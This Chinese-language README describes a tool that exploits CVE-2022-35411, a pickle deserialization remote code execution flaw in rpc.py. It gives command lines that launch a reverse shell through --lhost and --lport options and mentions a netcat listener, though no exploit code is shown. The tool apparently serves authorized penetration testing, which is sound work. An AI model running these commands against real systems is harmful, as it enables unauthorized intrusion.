这是一个更新和改进的利用程序,针对 CVE-2022-35411,目标版本为 rpc.py 中易受攻击的版本(<= 0.6.0)。
它允许通过 Python pickle 反序列化实现 未认证远程代码执行(RCE)。
原始利用作者:Elias Hohl
增强者:x7331 针对可用性、可移植性和自动化进行了改进
漏洞存在于 rpc.py 中对 Python pickle 模块的不安全使用,允许精心构造的有效载荷 无需认证 即可执行任意命令。
v0.4.2 – v0.6.0argparse,支持 --lhost、--lport、--target 和 --dry-run 参数-h / --help 提供正确的使用指导python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi
3.xrequests 库(使用 pip install requests 安装)nc -lvnp 9001)本利用工具仅用于教育和授权测试目的。 请勿将其用于你不拥有或未经明确许可进行测试的系统。